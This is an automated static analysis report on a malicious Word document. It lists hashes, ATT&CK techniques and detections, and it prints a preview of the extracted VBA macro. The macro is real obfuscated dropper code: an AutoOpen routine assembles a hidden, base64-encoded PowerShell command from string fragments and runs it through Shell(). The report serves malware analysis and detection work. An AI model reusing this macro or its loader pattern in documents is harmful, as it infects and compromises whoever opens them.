Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb910be2272948d9…

MALICIOUS

Office (OLE)

Size: 119.2 KB
Created: 2018-05-25 09:33:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 86d751896efdbe034c9c816638196d43
SHA-1: b4c80043537e33997aa94e9267c54449535c7910
SHA-256: eb910be2272948d91c32587a785bfa7ca5b9d3ed84a97c67f690854dbb1787c8
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes a Shell() call, indicating an attempt to execute an external command. This strongly suggests the file is a dropper designed to download and execute a second-stage payload, aligning with the ClamAV detection of 'Doc.Dropper.Agent-6556942-0'.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6557108-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6557108-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27143 bytes
SHA-256: 6361cc8fb4c90a85484b019dafa3ab01f62192da65ba296896499316fe89d76c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BFURziWmal"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dQllvDA()
On Error Resume Next
Set dlVBu = jbFdo
nwOTs = whusdZ + CSng(53803) + 49640 / Sin(86731 - CByte(69900) / 87185 - Round(20371)) + FEVCUN * dCiLY - (60825 + 22804 + 12098 - 3265)
Set QkKOkz = lHvZUY
ivtjwS = uFhSvw + CSng(66300) + 38923 / Sin(96145 - CByte(26422) / 41712 - Round(46381)) + TIAUVE * RMRmJd - (69042 + 56487 + 55708 - 72761)
dQllvDA = FWcHkww + pGjLuUQMKQs + YcJGpQ + plRlw + aNVRQUnU + opMliuKUGz + ShVzqiCOF + zGkGiqz + ViaCzZkS + JXdFzhB + UZmfbAzszl + LBqzibi + wCRAq + CIClqBHjN
Set HjBWid = oBwRJh
wbfZu = Nubdi + CSng(77289) + 89300 / Sin(18171 - CByte(34582) / 28459 - Round(9820)) + MkOovz * XZjCuz - (4893 + 69162 + 67534 - 24086)
End Function
Sub Autoopen()
On Error Resume Next
Set EDiMO = HXoqi
Wmrazw = HjhvXz + CSng(63991) + 84018 / Sin(63756 - CByte(57656) / 60669 - Round(8134)) + wPJBJ * WBhXJn - (77800 + 74667 + 19571 - 31979)
QsMpzXvcbz (dQllvDA)
Set ZEntE = XHKNh
atImX = GcpRwa + CSng(76450) + 49982 / Sin(17620 - CByte(45724) / 16718 - Round(67509)) + XbdEa * Rrumt - (96962 + 72855 + 78110 - 62319)
End Sub
Function QsMpzXvcbz(qZbTUw)
On Error Resume Next
Set iBARz = oOIGM
iMzwb = Kuwph + CSng(41088) + 11530 / Sin(95086 - CByte(23993) / 80520 - Round(91299)) + MlHSf * HSPTm - (29744 + 91148 + 39096 - 8442)
Set MhmvW = imKoTf
zqwSq = awMhdr + CSng(18210) + 71117 / Sin(82286 - CByte(13793) / 63841 - Round(88394)) + QukiC * vbHUH - (81737 + 6255 + 54353 - 13543)
QPVsZ = Shell(lijRb + Chr(vbKeyP) + pmpoSMNZn + qZbTUw, vbHide)
Set cowFa = MAAJEN
nfduF = QPMvS + CSng(89207) + 35722 / Sin(36263 - CByte(57364) / 8379 - Round(82121)) + OCVOS * omnijd - (86798 + 92948 + 66038 - 51329)
End Function


Attribute VB_Name = "pivzNqzQti"
Function FWcHkww()
On Error Resume Next
Set HuEfC = WIHiP
qstboV = ZhlQv + CSng(9143) + 93617 / Sin(99420 - CByte(20297) / 13775 - Round(18277)) + cbEqPM * QoQDsF - (2450 + 10898 + 48576 - 57406)
fHPhPBwGw = "owersH" + "eLL -WinDo" + "wsTyle h" + "idden -e" + " JgAoACAAJAB" + "QAFMAaABv"
Set fvXvv = ViJaG
LBwmn = lCdOB + CSng(10508) + 26945 / Sin(17656 - CByte(57837) / 87615 - Round(21047)) + zXVKbO * jjmUl - (7153 + 24110 + 19421 - 59543)
UWNLLdCWQWq = "AG0ARQBbADQAXQA" + "rACQAcABzAGgA" + "bwBNAEU" + "AWwAzAD" + "QAXQArA" + "CcAWAAnAC"
Set CtTNk = bWQuSh
ocTObi = BZkNGo + CSng(98499) + 64225 / Sin(84336 - CByte(20599) / 77931 - Round(91087)) + EbzrjO * unLUGz - (90174 + 96676 + 85781 - 35463)
jMtUQI = "kAIAAoACAAKAAo" + "ACgAIgB" + "7ADIAM" + "gB9AHsAMQAzAD" + "YAfQB" + "7ADgAMwB9AHsAMQ" + "AxADIAfQB7AD"
Set kbrDdJ = Hwoui
FXwhM = biNwtN + CSng(27532) + 30239 / Sin(13897 - CByte(13668) / 87120 - Round(1830)) + ZVDTrB * qmYRvz - (16767 + 9612 + 28491 - 67724)
bGQvwvNw = "EANAA2A" + "H0AewA" + "xADIANAB" + "9AHsAMQAyADEA" + "fQB7ADEAMgA3AH" + "0AewAxADYAN" + "AB9AHsAMQ" + "A1ADkAfQB7A" + "DkAOAB"
Set NlQrF = czpOt
ADnFFk = DGfNl + CSng(79040) + 19421 / Sin(91563 - CByte(6839) / 87688 - Round(9476)) + AYGfP * iQjru - (22785 + 69010 + 93523 - 76655)
HkXnlENT = "9AHsAMQAzADkA" + "fQB7AD" + "EAMwA4AH0AewA" + "yADMAfQB7"
Set OHuDU = juiXi
vbYEk = sauXY + CSng(63498) + 44491 / Sin(38544 - CByte(40977) / 22527 - Round(23513)) + ipBlh * zBonrL - (95223 + 83199 + 88224 - 62187)
pYGSmMc = "ADcAMwB9AHsAM" + "QA1AD" + "AAfQB7ADEAMQ" + "AxAH0A" + "ewA5ADMAfQB7" + "ADEANgA1AH0Aew"
Set ESqbi = NiqjN
ArUiOt = AKudEj + CSng(32613) + 9713 / Sin(66330 - CByte(66728) / 50312 - Round(63576)) + qzQtVs * lnHqMl - (41434 + 76157 + 92498 - 45167)
pAmFvh = "AxADYANwB9AHs" + "AMQA0ADgAfQB" + "7ADEAMwB9" + "AHsANAAyAH"
Set jzEfKK = lsNwiv
CapBb = MVuDMC + CSng(8741) + 32932 / Sin(37260 - CByte(25911) / 56456 - Round(17214)) + FqjiL * GEkAlm - (16880 + 23910 + 48835 - 18650)
XoGmB = "0AewA3AH0Aew" + "A2ADgAfQB7ADEA" + "MgA2AH0Ae" + "wA2ADMAfQ"
FWcHkww = fHPhP
... (truncated)